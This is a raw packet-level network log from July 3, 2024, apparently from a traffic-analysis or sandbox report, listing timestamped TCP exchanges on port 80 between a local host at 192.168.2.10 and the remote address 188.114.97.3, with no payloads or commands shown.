                                                    Jul 3, 2024 16:43:40.933414936 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.953573942 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:40.994483948 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.276802063 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.281869888 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.388411045 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.432003975 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.735140085 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.791443110 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.866281033 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.867011070 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.871664047 CEST8049839188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.871805906 CEST4983980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.871876001 CEST8049840188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.872003078 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.872080088 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.876884937 CEST8049840188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:41.968285084 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:41.973299980 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.066499949 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.066668987 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.071511984 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.071630955 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.231978893 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.236942053 CEST8049840188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.320619106 CEST8049840188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.369514942 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.395004988 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.447644949 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.530328989 CEST8049840188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.572731972 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.655373096 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.660321951 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:42.660459042 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.660562038 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:42.665416002 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.010312080 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.015474081 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.207057953 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.260122061 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.401257038 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.406313896 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.415102005 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.463257074 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.499656916 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.499804020 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.504817963 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.504918098 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.545388937 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.545826912 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.550723076 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.550750017 CEST8049841188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.550816059 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.550849915 CEST4984180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.551006079 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.555825949 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.834103107 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:43.885139942 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.901467085 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:43.906639099 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.006256104 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.057003021 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.348320007 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.401012897 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.447985888 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.494600058 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.571973085 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.571979046 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.576983929 CEST8049843188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.577164888 CEST8049842188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.577274084 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.577271938 CEST4984280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.577975988 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.582875013 CEST8049843188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.839131117 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.844003916 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.932097912 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.937417030 CEST8049843188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.937432051 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.937691927 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:44.943058014 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:44.943089962 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.074773073 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.075087070 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.079963923 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.080025911 CEST8049843188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.080058098 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.080117941 CEST4984380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.080379009 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.085454941 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.196770906 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.202367067 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.202444077 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.202579021 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.207472086 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.339270115 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.385147095 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.432209969 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.437222004 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.437516928 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.557127953 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.562176943 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.574035883 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.619494915 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.677907944 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.728913069 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.882349014 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.915699959 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:45.932029009 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:45.963264942 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.006063938 CEST4984080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.009311914 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.009812117 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.010551929 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.014553070 CEST8049844188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.015059948 CEST4984480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.015476942 CEST8049845188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.015497923 CEST8049846188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.015567064 CEST4984580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.015567064 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.015672922 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.020503044 CEST8049846188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.356400967 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.361453056 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.370336056 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.375407934 CEST8049846188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.455179930 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.455413103 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.460422039 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.460438013 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.464138031 CEST8049846188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.510166883 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.753828049 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.807053089 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.811393976 CEST8049846188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.856391907 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.929359913 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.934410095 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:46.934500933 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.934653997 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:46.939762115 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.306325912 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.311700106 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.408875942 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.463295937 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.613430977 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.666378975 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.742620945 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.743614912 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.748591900 CEST8049847188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.748668909 CEST4984780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.750983000 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.751063108 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.751213074 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.756072998 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.761028051 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.765898943 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.859983921 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.860156059 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:47.865139008 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:47.865173101 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.103952885 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.109026909 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.210644007 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.219525099 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.260128975 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.260130882 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.561326027 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.620393038 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.646692038 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.697638035 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.773663044 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.773664951 CEST4984680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.773920059 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.778799057 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.779660940 CEST8049848188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:48.779758930 CEST4984880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.779774904 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.779884100 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:48.784790993 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.137830019 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.142779112 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.214082956 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.219151020 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.313589096 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.313724995 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.318618059 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.319380999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.353463888 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.400753975 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.648189068 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.686954021 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.697657108 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.729212999 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.773813963 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.785706997 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:49.822622061 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:49.838274956 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.006428003 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.006967068 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.012128115 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.012159109 CEST8049849188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.012209892 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.012238979 CEST4984980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.012986898 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.018080950 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.372309923 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.378478050 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.486464977 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.541430950 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.794486046 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.799417973 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.809441090 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.854733944 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.894210100 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.895863056 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.901215076 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.901355028 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.929986000 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.930500031 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.935060978 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.935332060 CEST8049850188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.935385942 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.935491085 CEST4985080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.935502052 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.935625076 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.940160990 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.940243006 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.940475941 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:50.940530062 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:50.945530891 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.202677965 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.244529009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.291654110 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.291822910 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.296639919 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.296668053 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.296864986 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.382033110 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.406107903 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.432015896 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.447627068 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.598347902 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.603410959 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.608721018 CEST8049852188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.608772993 CEST4985280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.640175104 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.752106905 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.752453089 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.761353016 CEST8049853188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.761365891 CEST8049851188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:51.761432886 CEST4985180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.761432886 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.761656046 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:51.767293930 CEST8049853188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.119642019 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.124675035 CEST8049853188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.216429949 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.216464043 CEST8049853188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.221399069 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.260395050 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.314860106 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.316538095 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.321855068 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.322079897 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.564678907 CEST8049853188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.647317886 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.674830914 CEST4985380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.682703972 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.689238071 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.689342022 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.689553976 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:52.694390059 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:52.697647095 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.041673899 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.046804905 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.316390038 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.452130079 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.452203989 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.574021101 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.574930906 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.579174995 CEST8049854188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.579236031 CEST4985480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.579777002 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.579838037 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.579931974 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.584702969 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.651774883 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.656671047 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.750480890 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.750638962 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.755491018 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.755636930 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:53.932243109 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:53.937107086 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.030610085 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.088128090 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.135124922 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.197731018 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.397219896 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.403357983 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.408634901 CEST8049855188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.412689924 CEST4985580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.532396078 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.537734985 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.540582895 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.540582895 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.545531034 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:54.886837006 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:54.936311960 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.028476000 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.090536118 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.104429007 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.109349966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.202750921 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.202928066 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:55.207798004 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.207973957 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.541383028 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:55.588287115 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.558155060 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.563131094 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.606980085 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.608407974 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.612401962 CEST8049856188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.612503052 CEST4985680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.613290071 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.613382101 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.613468885 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.618427038 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.683948040 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.712749004 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.719310045 CEST8049830188.114.97.3192.168.2.10
